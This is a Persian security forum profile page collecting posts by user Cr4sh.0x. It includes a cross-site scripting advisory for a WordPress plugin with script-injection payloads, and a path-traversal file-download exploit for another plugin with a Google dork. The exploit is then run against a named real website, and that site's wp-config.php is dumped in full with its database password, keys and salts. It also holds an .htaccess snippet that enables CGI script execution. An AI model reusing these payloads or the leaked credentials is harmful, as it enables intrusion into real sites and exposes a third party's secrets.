رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Cr4sh.0x

Member
  • تعداد ارسال ها

    5
  • تاریخ عضویت

  • آخرین بازدید

اعتبار در سایت

0 Neutral

درباره Cr4sh.0x

  • تاریخ تولد ۹۶/۱۱/۱۱

Converted

  • Name
    Crash
  • Main os
    Linux
  • Programming language
    خیر
  1. https://cxsecurity.com/issue/WLB-2016030139
  2. https://packetstormsecurity.com/files/136425/WordPress-WP-External-Links-1.80-Cross-Site-Scripting.html
  3. http://www.vulnerability-lab.com/get_content.php?id=1788 Document Title: =============== WP External Links v1.80 - Cross Site Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1788 Release Date: ============= 2016-03-24 Vulnerability Laboratory ID (VL-ID): ==================================== 1788 Common Vulnerability Scoring System: ==================================== 3.5 Product & Service Introduction: =============================== Open external links in a new window or tab, adding "nofollow", set link icon, styling, SEO friendly options and more. Easy install and go. Configure settings for all external links on your site. After activating the plugin all options are already set to make your external links SEO friendly. Optionally you can also set the target for opening in a new window or tab or styling options, like adding an icon. (Copy of the Homepage: https://wordpress.org/plugins/wp-external-links/ ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple cross site scripting vulnerabilities in the official WP External Links v1.80 wordpress plugin. Vulnerability Disclosure Timeline: ================================== 2016-03-24: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== FreelancePHP Product: WP External Links - WordPress Plugin (Web-Application) 1.8 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple client-side web vulnerabilities has been discovered in the official WP External Links v1.80 wordpress plugin. The vulnerability allows remote attackers to inject malicious script codes to the application-side of the vulnerable modules. The vulnerabilities are located in the `[ignore]`,`[title]`,`[no_icon_class]` and `[class_name]` values of the `wp_external_links-main`, `wp_external_links-seo` or `wp_external_links-style` module POST method request. Remote attackers are able to inject script codes to the application-side of the affected modules. The attack vector of the issues are persistent and the request method to inject is POST. The injection point are the input fields and the execution occurs in the main context sub menu after the inject. The security risk of the application-side vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the persistent web vulnerabilities requires a privileged web application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent load of malicious script codes or persistent web module context manipulation. Request Method(s): [+] POST Vulnerable Module(s): [+] wp_external_links-main [+] wp_external_links-seo [+] wp_external_links-style Vulnerable Parameter(s): [+] [ignore] [+] [title] [+] [no_icon_class] [+] [class_name] Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers with low privileged or restricted user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. # PoC : http://localhost/wordpress/wp-admin/admin.php?page=wp_external_links wp_external_links-main[ignore] = "></textarea><script>alert('Cr4sh.0x')</script> wp_external_links-seo[title] = "><script>alert('Cr4sh.0x')</script> wp_external_links-style[no_icon_class] = "><script>alert('Cr4sh.0x')</script> wp_external_links-style[class_name] = "><script>alert('Cr4sh.0x')</script> Security Risk: ============== The security risk of the application-side cross site scripting web vulnerabilities in the wordpress plugin are estimated as medium. (CVSS 3.5) Credits & Authors: ================== Iran Cyber Security Group - Cr4sh.0x [iran-Cyber.Net] [http://www.vulnerability-lab.com/show.php?user=Iran%20Cyber%20Security] Special Tnx To : NOFOZI , root3r , Sir.H4m1d , 0day , pi.hack , 0x3a, s4jj4d , whitewolf , jok3r , MoHaMaD-BlAcK ,l3gi0 n , mr.turk ,0xdevil & king_k4li
  4. Cr4sh.0x

    Wordpress Hb Audio Gallery Lite 1.0.0 Arbitrary File Download

    # Exploit Title: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download # Exploit Author: CrashBandicot # Date: 2016-03-22 # Google Dork : inurl:/wp-content/plugins/hb-audio-gallery-lite # Vendor Homepage: https://fr.wordpress.org/plugins/hb-audio-gallery-lite/ # Tested on: MSWin32 # Version: 1.0.0 # Vuln file : gallery/audio-download.php 11. if( $_REQUEST['file_size'] && $_REQUEST['file_path'] ) { 13. $file_size = $_REQUEST['file_size']; 15. $file = $_REQUEST['file_path']; 17. $filename = basename($file); .... 55. Header("Content-Disposition: attachment; filename='" . $filename . "'"); # PoC : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 # 22/03/2016 - Informed Vendor about Issue https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html یک تارگت wp-config http://frenchandindianwarfoundation.org/wp-content/plugins//hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 <?php /** * The base configurations of the WordPress. * * This file has the following configurations: MySQL settings, Table Prefix, * Secret Keys, WordPress Language, and ABSPATH. You can find more information * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Codex page. You can get the MySQL settings from your web host. * * This file is used by the wp-config.php creation script during the * installation. You don't have to use the web site, you can just copy this file * to "wp-config.php" and fill in the values. * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'frencha1_wrd20'); /** MySQL database username */ define('DB_USER', 'frencha1_faiwf'); /** MySQL database password */ define('DB_PASSWORD', 'sharedk1'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'aIpTafrf3oMeN35aYLSARFhVYyo9zcto4tcIRPIcYupa1IeoZIeCdvlRBGy45oGu'); define('SECURE_AUTH_KEY', 'tTIo8KGX1epDBpNTpsjeiObp9UM18SxrqqK9i34UTJTSHkRhWpLeuEFgKUhABrxS'); define('LOGGED_IN_KEY', 'ltVSbMM5aRFtijxlOdDfPBuFzFHXsypVfcDqvKOfivMo0dfBlj8RXa0In4JXl5Fy'); define('NONCE_KEY', '0APUkY1AOs4EUpotCgh0ZifU9DplhFcyjy04ceFENrNwUKRv4UP1D5QPMkxikkI4'); define('AUTH_SALT', 'Jndc7xpMFoSEPigeePPFiyD6umkLl7w1w5eiIPcZ2FHOQ27qatr6TpLhghIWjCEw'); define('SECURE_AUTH_SALT', 'i1Rnoeu7EtGNxFLg77vNrH2fpOlRyomqWYe39jsrGJZE5hA8oqxkhNfMa9e3qvpz'); define('LOGGED_IN_SALT', 's8xdPHB8Xts65H7USP9iBU791lC8W4v9nYs51Cbd4MDPpWqF0wl96wl2OGo4H37D'); define('NONCE_SALT', 'c6YOjd6NrPtkIa4dnYfLVAlZOHjuxROK5R4KQKRhoDVoMORSAX1U8eWzGclqj0MC'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each a unique * prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'l7c6_'; /** * WordPress Localized Language, defaults to English. * * Change this to localize WordPress. A corresponding MO file for the chosen * language must be installed to wp-content/languages. For example, install * de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German * language support. */ define('WPLANG', ''); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php');
  5. سلام. می تونم id تلگرامتو داشته باشم؟ احتمالا همشهری هستیم :) از بچه های MIR هستی؟
  6. Cr4sh.0x

    مشکل اجرا اسکریپت Perl بر روی سرور

    سلام گاهی مواقع هم نیاز دارید تا فایل .htaccess رو آپلود کنید. Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .ss AddHandler cgi-script .pl AddHandler cgi-script .pl .htaccess.rar

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...